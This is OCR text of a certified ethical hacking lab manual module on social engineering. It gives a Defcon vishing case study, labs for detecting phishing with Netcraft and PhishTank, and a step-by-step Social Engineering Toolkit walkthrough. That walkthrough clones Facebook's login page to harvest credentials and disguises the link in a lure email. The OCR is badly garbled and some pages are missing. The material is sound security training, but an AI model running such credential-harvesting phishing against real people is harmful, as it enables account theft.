CEH v8 Labs Module 09 Social Engineering.pdf

8/14/2019 CEH v8 Labs Module 09 Social Engineering.pdf

1/28

CEH Lab Manual

S o c i a l E n g i n e e r i n g

M o d u l e 0 9


2/28

Module 09 - Social Engineering

Social EngineeringS o c ia l engineering is the a rt o f con vincing peo ple to reve al co n fid en tial in fo n m tio n .

L a b S c e n a r i o

Source: http:/ / monev.cnn.com/2012/08/O/technology/walmart-liack-de Icon/index, htm

Social engineering is essentially the art of gaining access to buildings, systems,01data by exploiting human psychology, rather than by breaking 111 01usingtechnical hacking techniques. The term social engineering can also mean anattempt to gain access to information, primarily through misrepresentation, andoften relies 011 the trusting nature of most individuals. For example, instead oftrying to find software vulnerability, a social engineer might call an employee

and pose as an IT support person, trying to tiick the employee into divulging111s password.

Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employeeinto giving 111111 information that could be used 111 a hacker attack to win acoveted black badge 111 the social engineering contest at the Deleonhackers conference 111Las Vegas.

111 tins year's Capture the Flag social engineering contest at Defcon, championShane MacDougall used lying, a lucrative (albeit bogus) government contract,and 111s talent for self-effacing small talk to squeeze the following informationout of Wal-Mart:

The small-town Canadian Wal-Mart store's janitorial contractor

Its cafeteria food-services provider

Its employee pay cycle

Its staff shift schedule

The time managers take thenbreaks Where they usually go for lunch

Type of PC used by the manager

Make and version numbers of the computer's operating system, and

Its web browser and antivirus software

Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken 111to the extent of coughing up so much scam-worthy treasure.

Calling from 111s sound-proofed booth at Defcon MacDougall placed anurgent call, broadcast to the entire Deleon audience, to a Wal-Mart storemanager 111 Canada, introducing liinisell as "GanDarnell" from Wal-Mart'shome office 111Bentonville, Ark.

I C O N K E Y

/ Va l uab l e

i n f o r m a t i o n

^ Test your

*5 W eb exercise

Q Workbook revie

Eth ical H acking and Countenneasures Copyright by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]

C EH Lab Manual Page 675
http://monev.cnn.com/2012/08/O%d6%be%d6%be/technology%d6%be/walmart-liack-http://monev.cnn.com/2012/08/O%d6%be%d6%be/technology%d6%be/walmart-liack-http://monev.cnn.com/2012/08/O%d6%be%d6%be/technology%d6%be/walmart-liack-http://monev.cnn.com/2012/08/O%d6%be%d6%be/technology%d6%be/walmart-liack-http://monev.cnn.com/2012/08/O%d6%be%d6%be/technology%d6%be/walmart-liack-http://monev.cnn.com/2012/08/O%d6%be%d6%be/technology%d6%be/walmart-liack-


3/28


The role-playing visher (visliing being phone-based phishing) told the managerthat Wal-Mart was looking at the possibility of winning a multimillion-dollargovernment contract.

Darnell ' said that 111s job was to visit a few Wal-Mart stores that had beenchosen as potential pilot locations.

But first, he told the store manager, he needed a thorough picture of how thestore operated.

111 the conversation, which lasted about 10 minutes, Darnell describedhimself as a newly lured manager of government logistics.

He also spoke offhand about the contract: All I know is Wal-Mart can make aton of cash off it, he said, then went on to talk about his upcoming visit,keeping up a steady patter about the project and life 111Bentonville, Crowleywrites.

As if tins wasn't bad enough, MacDougall/Darnell directed the manager to anexternal site to fill out a survey 111preparation for 111s upcoming visit.

The compliant manager obliged, plugging the address into 111sbrowser.

When his computer blocked the connection, MacDougall didn't miss a beat,telling the manager that he'd call the IT department and get the site unlocked.

After ending the call, stepping out of the booth and accepting 111s well-earnedapplause, MacDougall became the first Capture the Flag champion to captureevendata point, or flag, on the competition checklist 111 the three years it hasbeen held at Defcon. Defcon gives contestants two weeks to research their

targets. Touchy information such as social security numbers and credit cardnumbers are verboten, given that Defcon has no great desire to bring the lawdown on its head.

Defcon also keeps its nose clean by abstaining from recording the calls, whichis against Nevada law. However, there's no law against broadcasting calls live toan audience, which makes it legal for the Defcon audience to have listened as]MacDougall pulled down Wal-Mart's pants.

MacDougall said, Companies are way more aware about their security. Theyvegot firewalls, intrusion detection, log-in systems going into place, so its a lotharder for a hacker to break 111these days, or to at least break in undetected. Soa bunch of hackers now are going to the weakest link, and the link that

companies just arent protecting, which is the people.\

MacDougall also shared few best practices to be followed to avoid falling victimto a social engineer:

Never be afraid to say no. If something feels wrong, something iswrong

An IT department should never be calling asking about operatingsystems, machines, passwords or email systemsthey already know

Ethical Hacking and Countermeasures Copyright by EC-Council




4/28


Set up an internal company security word of the day and dont give anyinformation to anyone who doesnt know it

Keep tabs 011whats 011 the web. Companies inadvertently release tons

of information online, including through employees social media sites

As an expert e t h i c a l h a c k e r and p e n e t r a t i o n t e s t e r , you should circulate thebest practices to be followed among the employees.

L a b O b j e c t i v e s

The objective of this lab is to:

Detect phishing sites

Protect the network from phishing attacks

To earn* out diis lab, you need:

A computer nuuiing Window Seiver 2012

A web browser with Internet access

L a b D u r a t i o n

Time: 20 Minutes

O v e r v i e w S o c i a l E n g i n e e r i n g

Social engineering is die art of convincing people to reveal confidential information.Social engineers depend 011 the fact that people are aware of certain valuable

information and are careless 111protecting it.

L a b T a s k s

Recommended labs to assist you 111social engineering:

Social engineering

Detecting plusliuig using Netcraft

Detecting phishing using PliishTank

L a b A n a l y s i s

Analyze and document the results related to the lab exercise. Give your opinion 011your targets security posture and exposure.

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S

R E L A T E D T O T H I S L A B .

& T o o l s

d e m o n s t r a t e d i n

t h i s l a b a r e

ava i lab le in

D:\CEH-

Tools \CEHv8

Module 09 Soc ia lE n g in e e r in g

T A S K 1

Overv iew

Eth ical H acking and Countemieasures Copyright by EC-Council




5/28


Delecting Phishing Using NetcraftN etrm ftp rov id es neb server and neb hosting w arket-sha re an a lysis, in clu d in g n 'eb

se rver an d o p erating system detection .

L a b S c e n a r i o

By now you are familiar with how social engineering is performed and what sortot information can be gathered by a social engineer.

Phishing is an example of a social engineering technique used to deceive users,and it exploits the poor usability of current web security technologies.

Phishing is the act of attempting to acquire information such as user names,passwords, and credit card details (and sometimes, indirectly, money) bymasquerading as a trustworthy entity 111 an electronic communication.Communications claiming to be from popular social websites, auction sites,online payment processors, 01IT administrators are commonly used to lure theunsuspecting public. Phishing emails may contain links to websites that areinfected with malware. Phishing is typically carried out by email spoofing 01instant messaging and it often directs users to enter details at a fake websitewhose look and feel is almost identical to the legitimate one.

Phishers are targeting the customers of banks and online payment services.They send messages to the bank customers by manipulating URLs and websiteforger\T. The messages sent claim to be from a bank and they look legitimate;users, not realizing that it is a fake website, provide their personal informationand bank details. Not all phishing attacks require a fake website; messages that

claim to be from a bank tell users to dial a phone number regarding problemswith their bank accounts. Once the phone number (owned by the plusher, andprovided by a Voice over IP service) is dialed, it prompts users to enter theiraccount numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-ID data to give the appearance that calls come from a trusted organization.

Since you are an expert e t h i c a l h a c k e r and p e n e t r a t io n t e s t e r , you must beaware of phishing attacks occurring 011 the network and implement anti-

phishing measures. 111 an organization, proper training must be provided topeople to deal with phishing attacks. 111 this lab you will be learning to detectphishing using Netcraft.

I C O N K E Y

/Valuable

information

v Test vour.*

*a W eb exercise

f fi ! Workbook revi!





6/28



Tins kb will show you phishing sites using a web browser and show you how to

use them. It will teach you how to: Detect phishing sites

Protect the network from phishing attack

To carry out tins lab you need:

N e tc r a f t is located at D:\CEH-Tools \CEHv8 M o d u le 09 S o c i a lE n g i n e e r i n g \ A n t i - P h i s h i n g T o o l b a r \ N e t c r a f t T o o l b a r

You can also download the latest version of N e tc r a f t T o o lb a r from thelink http://toolbar.netcralt.com/

If you decide to download the l a t e s t v e r s i o n , then screenshots shown111the lab might differ

A computer running Windows Server 2012

A web browser (Firefox, Internet explorer, etc.) with Internet access

Administrative privileges to run the Netcraft toolbar


Time: 10 Minutes

O v e r v i e w o f N e t c r a f t T o o l b a r

Netcraft Toolbar provides I n t e r n e t s e c u r i t y s e r v i c e s , including anti-fraud andanti-phishing services, a p p l i c a t i o n t e s t i n g , code reviews, automated penetrationtesting, and r e s e a r c h d a t a a n d a n a l y s i s on many aspects o f the Internet.

L a b T a s k s

1. To start this lab, you need to launch a web browser first. 111this lab wehave used Mozi l la Fi re fox .

2. Launch the S t a r t menu by hovering the mouse cursor on the lower-leftcorner of the desktop.

^ ~ T o o l s

d e m o n s t r a t e d i n

t h i s l a b a r e

ava i lab le in

D:\CEH-

Tools \CEHv8

Module 09 Soc ia l

E n g in e e r in g

^ T A S K 1

Anti-Phishing Tool

b a r



http://toolbar.netcralt.com/http://toolbar.netcralt.com/


7/28


JL

5

* | Windows Server 2012

!m i 2012RcIcak CanJiaatr Dot*cnv-tift lmHon copyBwOMW

Q=JYo ucau also

download the Netcraft

toolbar form

http://toolbar.11etcraft.com

F IG U R E 1.1: Windows Server 2012-Start Menu

3. Click the Mozi l la Fi re fox app to launch the browser.

F IG U R E 1.2: Windows Server 2012-Start Menu Apps view

4. To download the N e tc r a f t T o o lb a r for Mozi l la Fi re fox , enterhttp://toolbar.11etcraft.com 111 the address bar of the browser or dragand drop the n e t c r a f t _ t o o l b a r -1.7-fx .xpi file 111Firefox.

5. 111tins lab, we are downloading the toolbar from the Internet.

6. 111 Firefox browser, click D o w n l o a d t h e N e t c r a f t T o o l b a r to install asthe add-on.

SIN G LEH 3P n , ,

^

etcM i f t

Mtc-ft Toolbar

Why utt Ntcraft Toolbar?

U Protect your taviitQf fromI'hMhtnqattack*,

a seethe hoittnq tot at)or1andHtefcMataiq01evl!uatr 0*tcn*kialualon copy Hu!a MW

-g *fa

F IG U R E 2.1: Windows Server 2012-Start Menu

3. Click the Mozi l la Fi re fox app to launch the browser.

F IG U R E 2.2: Windows Server 2012-Start Menu Apps view

4. Type h t t p : / / w w w . p h i s h t a n k . c o m 111the address bar of the web browserand press E n te r .

ing5. You will see the follow

P h i s h T a n k . ..

Join tie fiylitaya iittt ptiialiiiKj

Sutomrtstspsdgdphshes TracktheUatis of yoursuhmfyaonsVerfy-r tom

lg li ia rtc usemncs.aebfu.ictscmnsraurAxroim

m.cvnPM/iMlct.Kni

01 PlushTaiik provides an

open API for developers and

researchers to integrate anti-

phishing data into dieir

applications at no charge.

F IG U R E 2.3: Welcome screen of PhishTank



http://www.phishtank.com/http://www.phishtank.com/


15/28


6. Type the w e b s i t e UR L to be checked for phishing, for example,http: / / sdapld21.host21.com.

7. Click I s i t a p h i sh ? .

*MhTinkprovttet oh An tar

Join the fight against phishing

Submrt tu wc d phsftua. Rack the ttatic of 1/cur submissions

Vecfyoherj sct s suonssnns Develop softwarewimour fteeAPI.

jrttp//KiJptaV. ItMtUcem

R#c*r< SubTKSorsdim) fjst) lu>mi ftLImmup>.le0pirn

' Imi TVl. J4CIUY...

PliishTauk 1s operatedby Open DN S to improve

the Internet through safer,

faster, and smarter DNS.

F IG U R E 2.4: Checking for site

If the site is a p h is h in g s i te , you see the following warning dialog box.

PhishTank Ok of it* NM.io*MTw*

Submission #1571567 is aimentty ONLINE

S01 n or Hcgctoto vert, t !6sutxnssior.

No screenshot yet

We have not ye! successfully takena screeasltol f the submitted website.

FIG U R E 2.5: Warn ing dialog for phishing site

L a b A n a l y s i s

Document all die websites and verify whether diey are phishing sites.

0 2 Open DN S is

interested in having die

best available information

about phishing websites.

Tool/Util ity Information Collected/Object ives Achieved

PhiskTank Phishing site detected

Eth ical Hacking and Countemieasures Copyright by EC-Council




16/28




Q u e s t i o n s

1. Evaluate what PhishTank wants to hear about spam.

2. Does PhishTank protect you from phishing?

3. Why is Open DNS blocking a phish site that PhishTank doesn't list orhas not vet verified?

Internet Connection Required

0 YesPlatform Supported

0 Classroom

No

!Labs





17/28


3Social Engineering PenetrationTesting using Social Engineering

Toolkit (SET)Th e So c ia/E n g in eer To o/k it (S E T ) is an open-source Python -dr iven too l a im ed a t

p en etratio n testing arou n d so cia l eng ineering

c o n k e y L a b S c e n a r i o

Social engineering is an ever-growing threat to organizations all over the world.Social engineering attacks are used to compromise companies evenday. Eventhough there are many hacking tools available with underground hackingcommunities, a social engineering toolkit is a boon for attackers as it is freely

available to use to perform spear-pliishing attacks, website attacks, etc.Attackers can draft email messages and attach malicious files and send them toa large number of people using the spear-pliishing attack method. Also, themulti-attack method allows utilization of the Java applet, Metasploit browser,Credential Harvester/ Tabnabbing, etc. all at once.

Though numerous sorts ot attacks can be performed using tins toolkit, tins isalso a must-liave tool for a penetration tester to check for vulnerabilities. SET isthe standard for social-engineering penetration tests and is supported heavilywitlun the security community.

As an e t h i c a l h a c k e r , penetration tester, or s e c u r i ty a d m i n i s t ra t o r you

should be extremely familiar with the Social Engineering Toolkit to performvarious tests for vulnerabilities 011 the network.


The objective of tins lab is to help sUidents learn to:

Clone a website

Obtain user names and passwords using the Credential Harvestermethod

Generate reports for conducted penetration tests

__ Valuable

information

s Test yourknowledge

Web exercise

mWorkbook review

Eth ical H acking and Countemieasures Copyright by EC-Council




18/28


L a b E n v i r o n m e n t

To earn out die kb, you need:

Run this tool 111B a c k T r a c k Virtual Machine

Web browser with Internet access

Administrative privileges to mn tools


Tune: 10 Minutes

O v e r v i e w o f S o c i a l E n g i n e e r in g T o o l k i t

Sockl-Enguieer Toolkit is an open-source Python-driven tool aimed at penetrationtesting around Social-Engineering. The (SET) is specifically designed to performadvanced attacks against die human element. The attacks built into die toolkit aredesigned to be targeted and focused attacks against a person or organization usedduring a penetration test.

L a b T a s k s

1. Log in to your B a c k T r a c k virtual machine.

2. Select A p p l i c a ti o n s ^ B a c k T r a c k ^ E x p l o it a ti o n T o o l s ^ S o c i a l

E n g i n e e r i n g T o o l s ^ S o c i a l E n g i n e e r i n g T o o l k i t and click Se t .

& T oo ls

d e m o n s t r a t e d in

t h i s l a b a r e

ava i lab le in

D:\CEH-

Tools\CEHv8

Module 09S o c i a lE n g in e e r in g

T A S K 1

E x e c u t e S o c i a lEngineer ing

Toolk i t

3 Tue Sep 25. 7:10 PM^Applications[ Places System [>7]

a9 BEEF XSS Framework

9 HoneyPots

11 Social Engineering Toolkit

f* Network Exploitanor Tools.-

Web Exploitation Tools

^DatabaseExploitationTools

Wireless Exploitation Tools

|9Social E jifM

Physical Exploitation

3\Open Source Expl oited ,h set

|Q InformationGathering

r vulnerability Assessment

J0ExploitationTools

Privilege Escalation

Ef MaintainingAccess

Reverse Engineering

I RFIDTOols

O

Forensic!*

KCporting Tools

(P services

y Miscellaneous


19/28


3. A T e r m i n a l window for SET will appear. Type y and press E n t e r toagree to the terms of service.

File Edit View Terminal HelpTH IS SOFTWARE, EVEN IF ADVISED OF THE PO SS IB IL IT Y OF SUCH DAMAGE.

The ab o ve l ice n s in g was ta ke n f ro m th e BSD l i ce n s in g a n d ^ i s a p p l i e d to S o c ia l -E n

g i n e e r T o o l k i t as w e l l. ___ " * ^ 1

N o te t h a t t h e S o c i a l -E n g i n e e r T o o l k i t i s p r o v i d e d as i s , a nd i s 3 r o y a l ty f r e e 0

p e n - s o u r c e a p p l i c a t i o n . M r

F e e l f r e e t o m o d i fy , u s e, c ha n ge , m a r k e t , d o w h a t e ve r u w a nt w i t h i t a f l o n g a

s y o u g i v e t h e a p p r o p r i a t e c r e d i t w h e r e c r e d i t

i s d ue ( w h ic h means g i v i n g t h e a u t h o rs t h e c r e d i t t h e y i fe s e r v e f o r w r i t i n g i t ) .

A l s o n ot e t h a t b y u s in g t h i s s o f t w a r e , i f y ou ev e r

see the c re ato r o f SET in a bar , you are re qu i red to g iv e h im a hugand buy him

a beer . Hug must la s t a t le as t 5 seconds. Author

h o ld s th e r i g f t t t o r e fi p se th e h ug o r th e b e e r . f | ^ \ \f l o t ' B k i l . I f y o u \a re

1 \Jo u a r e v i o l a tt inqXn a t y o u w i l l o n ly us

T ^ ^ * c M 1 - E t l^ e e r T A l k it W s r y T i g f l f i j p y e l y good pn


20/28


Te rm ina l

File Edit View Terminal Help

J o i n u s o n i r c . f r e e n o d e . n e t i n c h a n ne l # s e t o o l k 1 t

The Soci al - Engi neer Tool ki t i s a product of Trust edSec.

Vi si t : ht t ps: / / www. t rust edsec. com

Select f rom the menu:

1 ) S p e a r -P h i sh in q A t ta c k Ve c to r s

| 2 ) W e b s ite A t ta ck V e c to r s |

3 ) In fe c t i o u s Me d ia G e n e ra to r

4 ) Create a Payload and L is tener

_ 5 ) Hass M a i l e r A t ta c k _I 6 ) A r du in o -B a s e d A t t a c k v e c t o r g

|^ % S M S S po ofin g A tta ck V e c t o r ^ I A8 ) W i re l e ss A cce ss P o in t A t ta ck V e c to r

9 ) QRCode Gen era tor A t ta c | Vecto r

10) P o w e r s h e ll A t t a c k V e c t l rs

11) T h i r d P a r ty Mo du le s

99) R eturn back to the m ain menu.

>r5s____________________________________________________

a c k

U

1) Java Ap plet A t tack Method

2) M e t asp lo i t B rowser Ex p lo i t Met hodI 3) C red en t ia l H arvester At ta ck Method |

4) Tabnabbing Attack Method5) Man le f t i n t he M idd le A t t ack Method

6) Web Jacking A ttac k Method

7) M u l t i -A t t ac k Web Het ho l

8 ) V i c t im Web P ro f i l e r

9 ) C rea te o r imp or t a CodeS ign ing C e r t i f i ca t e

99) Return to Main Menu

se t :weba t tack j3B 1

F IG U R E 3.4: Social Engineering Attacks menu

6. 111the next set of menus that appears, type 3 and press E n t e r to select

the C r e d e n t i a l H a r v e s t e r A t t a c k M e t h o d


and t he Back |T rack team. Th is method u t i l i z e s ! fram e rep lacement s t o

make t he h igh l i gh t e d URL l i n k t o appear l eg i t ima t e however * tf 1en c l i c ked

a w indow pops up then i s rep laced w i t h t he m a l i c i ous l i n k . You can ed i t

t h e l i n k r e pl ac e m e nt s e t t i n g s i n t h e s e t ^ c o n F ig i f i t s t o n f c * k o / fa s t .

The M u l t i -A t t ac k method w i l l add a comb ina t i on o f a t t ack s t h rough t he web a t t ac

k J r

menu. For example you can u t i l iz e the Java A pp let , M eta sp lo i t Browser,

C re de n t ia l Harves t e r /Tabnab b ing , and t he Man L e f t i n t he M idd le a t t ack

a l l a t once t o see wh ich i s succe ss f u l . m .

F IG U R E 3.5: website Attack Vectors menu

7. Now, type 2 and press E n t e r to select the S i t e C l o n e r option from the

menu.

C Qt i!e Social-Engineer

Toolkit "Web A ttack"

vector is a unique way of

utilizing multiple web-

based attacks in order to

compromise the intended

victim.

0 3 Th e Credential

Harvester Method will

utilize web cloning of a

website that has a usernameand password field and

harvest all die information

posted to d ie website.

Eth ical Hacking and Countemieasures Copyright by EC-Council


https://www.trustedsec.com/https://www.trustedsec.com/


21/28


Te rm ina l


9) Create or imp or t a CodeSign ing M

99) R eturn t o M ain Menu

s e t : w e b a t t a c k > 3

T he f i r s t m et ho d w i l l a l lo w SET t o i m p o r t '! * l i s t o f p r e - d e f i n e d w eba p p l ic a t io n s t h a t i t can u t i l i z e w i th i n t h e a tt a c k .

The seco nd metho d w i l l co m p le te l y c l o n e a we b s i te o f yo u r ch o o s in g

a nd a l l o w y ou t o u t i l i z e t h e a t t a c k v e c t o r s w i t h i n t h e c o m p l e t e ly

same web a p p l i ca t i o n yo u we re a t te m p t i n g to c l o n e .

Ih e th i r d me th od aUo ws yo u j to im p o r t yo u r own we b s ip ; , n o te t ^a t you

Shou ld on ly have a l t' inde x.h tm l when using the imp or t Websi te

functionality^^* Y jF ^ I V ) / 1) Web T em p la te s v I ^ 3 4

1 2) S i t e C l o n e r ! I \3 ) Custom Imp or t -

99) R eturn to Web attack Menu

; e t : w e b a t t a c k a E f |_______________

C Qt 11e Site C loner is used

to done a website of your

choice.

F IG U R E 3.6: Credential Harvester Attack menu

Type the IP a d d r e s s of your BackTrack virtual PC 111the prompt lor IPa d d r e s s f o r t h e P O S T b a c k i n H a r v e s t e r /T a b n a b b i n g and press E n te r .111tins example, the IP is 10.0.0.15

*

* Te rm in a l


a p p l ic a t io n s t h a t i t can u t i l i z e w i th i n t h e a tt a c k .

The se co n d me th od w i l l co m p le te l y c l o n e a we b s i te o f yo u r ch o o s in g

a nd a l l o w y ou to u t i l i z e t h e a t t a c k v e c t o r s w i t h i n t h e c o m p l e te l y

same web a p p l i ca t i o n yo u we re a t te m p t i n g to c l o n e .

The th i r d me th od a l l o ws you to imp o r t yo u r own we b s i te , n o te th a t yo u

sh o u ld o n l y h a ve a n i n d e x .h tm l wh en u s i n g th e im p o r t we b s i te

f u n c t i o n a l i t y .

1) Web Templates

2 ) S i t e C l o n e r

3 ) C us to m I m p o r t _ '

1 9 9 ) Re tu rn to We b A ta ck Menu I / . * | ^

J[jLSir br r 3t -1 C r e d e n t ia l h a r v e s t e r w i l t a l l o w yo u t o u t i l i z e t h e c lo n e c a p a b i l i ti e s w i t h i n

set J[ - 1 to h a r ve s t c re d e n t i a l s o r p a ra me te r s f ro m a we b s i te as we l l a s p i e ce the m in

t o a r e p o r t

[ - 1 Th i s o p t i o n i s u sed fo r wh a t IP th e se r v e r w i l l POST to .

[ - J I f y o u ' r e u s in g an e x t e r n a l I P , u se y ou r e x t e r n a l I P f o r t h i s

: > IP address for the POST back in Harvester/Tabnabbina:110.0.0.1s|

F IG U R E 3.7: Providing IP address in Harvester/Tabnabbing

Now, you will be prompted for a URL to be cloned, type the desiredURL for E n t e r t h e u rl to c l o n e and press E n te r . 111tins example, wehave used w w w . f a c e b o o k . c o m . Tins will nntiate the cloning of thespecified website.

COSt 11e tabnabbing attack

mediod is used when a

victim has multiple tabs

open, when the user clicks

die link, die victim w ill bepresented with a Please

wa it while the page loads .

Wh en the victim switches

tabs because he/she is

multi-tasking, die website

detects that a different tab

is present and rewrites die

webpage to a website you

specify. The victim clicks

back on the tab after a

period of time and diinks

diey were signed out of

their email program or their

business application and

types the credentials in.

When the credentials are

inserts, diey are harvestedand the user is redirected

back to the original

website.



http://www.facebook.com/http://www.facebook.com/


22/28


* Te rm in a l


an d a l lo w y ou t o u t i l i z e t h e a t t a c k v e c t o r s w i t h i n t h e c o m p l e te l y

same web a p p l ic a t i o n y ou w ere a tt e m p tin g t o c l o n e T ^ ^ ^ ^ ^ ^ ^

The th i r d me th od a l lo w s yo u to im p o r t - ym j r own we b s i te , n o te th a t yoush o u ld o n l y h a ve a n in d e x .h tm l wh en u s i n g th e im p o r t we b s i te

f u n c t i o n a l i t y .

u t i l iz e t h e c lo n e c a p a b i li ti e s w i t h i r

1) Web Templates

2 ) S i t e C l o n e r

3) Custom Import

99) R eturn to Webattack Menu

:we b a t ta ck>2

h a t IP th e se r ve r w i l l POST to .

[ ] C r e d e n t i a l h a rv e s t e r w i l l a l lo w y o u t o

Jr> 1 T JT] ] t o h a r v e s t c r e d e n t i a l s o r p a ra m e t er s f

3r A

rom a we bsi te as w e l l as p lace them i r

to a r e p o r t I ^ % I % I V J 1

[-] T h i s o p t i o n i s u se d f o r | h a t I P t h e s e r v e r w i l l P OST t o . V ^ M[ ] I f y o u ' r e u s i n g an e x t e r n a l I P , u s e y o u r e x t e r n a l I P f o r t h i s

s e t :we b a t ta ck> IP a d d re ss fo r th e P OST b a ck i n H a rve s te r /Ta b n a b b in g :1 0 .0 .0 .1 5

[ ] SET su pp ort s b oth HTTP and HTTPS

[- ] Example : h t t p : / /w w w . th i s i s a f a k e s i t e . com____________

; e t :we b a t ta ck> E n te r th e u r l t o c l o n e :Rvww. fa ce b o o k . com!

FIG U R E 3.8: Providing U R L to be cloned

10. Alter cloning is completed, the highlighted message, as shown 111diefollowing screenshot, will appear on the T e r m i n a l screen ot SET. PressE n t e r to continue.

11. It will start Credential Harvester.


99) R eturn to Webattack Menu

se t :we b a t ta ck>2 5 1

[ -1 C r e d e n t ia l h a r v e s te r w i l l a l lo w y ou to u t i l i z e t h e c lo n e c a p a b i l i ti e s w i t h i n

SET[ - ] t o h a r v e s t c re d e n t i a l s o r p a ra me te r s fr o m a we b s i te as we l l as p la ce the m i n

to a r e p o r t

[ - ] Th i s o p t i o n i s u sed fo r wh a t IP th e se r ve r w i l l P OST to .

t - J I f y o u ' r e u s i n g a n e x t e r n a l I P , u s e y o u r e x t e r n a l I P f o r t h i s

se t :we b a t ta ck> IP a d d re ss fo r th e P OST b a ck i n H a rve s te r /Ta b n a b b in g :1 0 .0 .0 .1 5

{ - ] SET su pp ort s b oth HTTP and HTTPS

I - ] E xa mp le : h t t p : / /w w w . t h is i s a f a k e s i te . c o m I

s e t : w e b a t ta c k > E n t e r t h e u r l t o c l o n e : www.facebook.com

b .[ * ] C l o n in g th e w e b s it e : h t t p s : / / lo g i n . f a c e b o o k . c o m / lo g i n . p h p

[ * j T h i s c o u ld t a k e a l i t t l e b i t . . . 1 I J

fokc - ,POSTs on a we bs ite .

Trie b e v Ttoaie fteu tfm.k i J 11f i e l d s a r e a v a i la b l e . R e g a r d le s s , K h i

[ ! ] I h a ve r ea d th e ab o ve me ssag e.

t o c o n t i n u eP re ss < re tu r i

FIG U R E 3.9: SE T Website Cloning

12. Leave the Credential Harvester Attack to fetch information from thevictims machine.

C Qt 11e web jacking attack

method will create a

website clone and present

the victim w ith a link

stating that the website has

moved. This is a new

feature to version 0.7.

1333 If you re doing a

penetration test, register a

name thats similar to the

victim, for Gmail you coulddo gmail.com (notice the

1), something similar diat

can mistake the user into

thinking it s die legitimate



http://www.thisisafakesite.com/http://www.facebook.com/http://www.facebook.com/http://www.thisisafakesite.com/


23/28


* Terminal


[-] Credential harvester w ill a llow you to uti liz e the clone capa bilitie s within

SET[-] to harv est c red en tial s or parameters from a website as we ll as place them in

to a report [] This option is used for what IP the serv er w ill POST to. _ * a * * '

[-] I f you're using an extern al IP , use your external I P for th is

se t:webattack> IP address for the POST back in Ha rve ste r/T ab na bb ing :lf^^ ^^ ^[-] SET supports both HTTP and HTTPS[-1 Example: http://www.thisisafakesite.com

se t:webattack> Enter the url to clone:www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php

[*j This could take a l it t l e b it. ..

password torm

POSTs A a webssername andftptures al

The beat way to use this att ac k i i ff ie ldsf trg ava i lab le . Rej rd less . hi

l ! ] I have read the above message.

Press to continue

] Social-Engineer Toolkit Credential Harvester Attack, j Cre den tial Harv ester is running on port 80

] Information w il l be displayed to you as i t ar riv es below:

FIG U RE 3.10: SET Credential Harvester Attack

13. N o w , y o u h a v e t o s e n d t h e I P a d d r e s s o f y o u r B a c k T r a c k m a c h i n e t o a

v i ct im a n d t r ic k h im o r h e r t o c l i c k t o b r o w s e t h e I P a d d r es s .

1 4. F o r t in s d e m o , la u n c h y o u r w e b b r o w se r 11 1 t h e Ba c k T r a c k m a c h in e ;

launch your favor i te emai l se rv ice . 1 1 1 t h i s e x a m p le we h a v e u se d

w w w . g m a i l . c o m . L o g in t o y o u r g m a i l a c c o u n t a n d c o m p o se a n e m a il .

FIG URE 3.11: Composing email in Gmail

1e e m a i l w h e r e y o u w i sh t o p l a c e t h e

icon.C O

15 . Place the cursor 11 1 t h e b o d y o f t

f ake URL. Then , c l ick the L ink

m When you hover overthe link, die URL will be

presented with the realURL, not the attackers

machine. So for example if

youre cloning gmail.com,

the UR L when hovered

over it would be gmail.com.

When the user clicks the

moved link, Gmail opensand then is quickly replaced

with your malicious

Webserver. Remember you

can change the timing ofthe webjacking attack in die

config/set_config flags.

0=5! Most o f the time they

wont even notice the IP

but its just another way toensure it goes on without a

hitch. Now that the victimenters the username and

password in die fields, you

will notice that we can

intercept the credentials

now.

Eth ical H acking and Countenneasures Copyright by EC-Council


http://www.thisisafakesite.com/http://www.facebook.com/https://login.facebook.com/login.phphttp://www.gmail.com/http://www.gmail.com/https://login.facebook.com/login.phphttp://www.facebook.com/http://www.thisisafakesite.com/


24/28


Compose Mail 9) >flma1l.com * Gmail Mozilla FiretoxEjle Edit yiew History flook marks Ipols Help

T C |121 Google Q,S' ^ fi http google.com/n il,|BackTrack Lnux Hot fensiwe Security |lExploitDB ^Aircrack-ng J^SomaFM

Gmail Documents Calendar More

0 + Share

oG 0 v g le

Discard Labh Draft autosaveti at 10:4a AM (0 minutes ago)

- [email protected], I

Add Cc Add Bcc

Su bject @TOI F - Party Pictures

Attachano

B I y T rT * A T [oo|t= IE 5 i* 5 ^ * s 1% Plain Toxt chock spoilingHoilo Sam.

PI4m click this link lo view U>* w#kt11d (vtrty picture* at TGIF wflh thw cmMxMim*

Regards.

m.

Inbox

SUrrwJ

Important

Sert Mail

Drafts (2)

Circles

Search chat or SU'9

FIGU RE 3.12: Linking Fake URL to Actual URL

16. 111 the Ed it Link w ind ow , f irst type die a ctua l address 11 1 t h e We b

a d d r e s s fi el d u n d e r t h e L i n k t o o p t i o n a n d t h e n t y p e d ie f a k e U R L 111

die T ex t to d isp lay he ld . 111 th is example , the w eb add ress we have

used i s h t t p : / /1 0 . 0 . 0 . 1 5 and tex t to d isp lay i s

w w w . f a c e b o o k . c o m / R i n i TGIF. Click OK

g)gmail.com -Gmail Mozilla Firetox).omaFM

IM C

Rlni Search Images Maps Play YouTube

Go . ) g I e

Draft eutosaved at 10:45 AM (0 minutes ago)

Edit Link

X

Toxt to aiepiay: L w (V facebook com/Rini TG 1f ] Q

Ur* to. To what URL should this link go?

0 Web address |wtp0.0.15 10/|QC Email *** Th>I(1|IK*

Not ure wrhat to put In the boxT rm fhd t**imgean the t*ob fat you wanr to Ink to (A

scarc heroine mottt be useful.) Then ceoy e ate address *rom the box h your browser's1addroso Qor and potto it 140 tno box aoov

| OK | Cancel

Inbox

Starred

Important

Sent Mai

Drafts (2)

Circles

JunkE-mal

FIG URE 3.13: Edit Link window

1 7 . T h e f a k e URL sh o u ld a p p e a r 11 1 t h e e m a i l b o d y , a s sh o w n 11 1 the

fo l lowing screensho t .



mailto:[email protected]://10.0.0.15/http://10.0.0.15/http://10.0.0.15/http://www.facebook.com/Rinihttp://www.facebook.com/Rinihttp://10.0.0.15/mailto:[email protected]


25/28


Compose Mail ......... (g>gma1l.com * Gmail Mozilla FirefoxEjle Edit History flook marks Ipols Help

gBackTrack Linux |*|Offensive Security |[JjExploit-DB Aircrack-ng jgjjSomaFM

